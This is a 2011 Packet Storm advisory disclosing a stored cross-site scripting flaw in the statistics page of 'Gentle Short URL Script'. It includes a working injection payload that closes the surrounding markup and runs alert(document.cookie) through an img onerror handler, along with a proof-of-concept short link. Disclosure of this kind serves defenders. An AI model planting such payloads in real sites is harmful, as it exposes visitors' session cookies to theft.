Gentle Short URL Script Stored Cross Site Scripting

2011-09-03T00:00:00
ID PACKETSTORM:104767
Type packetstorm
Reporter Eyup CELIK
Modified 2011-09-03T00:00:00

Description

                                        
                                            `# Exploit Title: Gentle Short URL Script Stored XSS  
# Date: 2011  
# Author: Eyup CELIK  
# Version: All Version  
# Tested on: All versions are Vulnerability  
# Web Site: www.eyupcelik.com.tr  
  
ISSUE  
  
Link shorten, send to a victim.  
  
Vulnerable Module: Shorten URL Statics  
The end of the shortened link ! mentions  
  
Exploit:  
"/></a></><img src=1.gif onerror=alert(document.cookie)>  
  
POC:  
http://unrelo.com/PJls!  
  
  
Thanks,  
  
  
Eyup CELIK  
Information Technology Security Specialist  
http://www.eyupcelik.com.tr  
`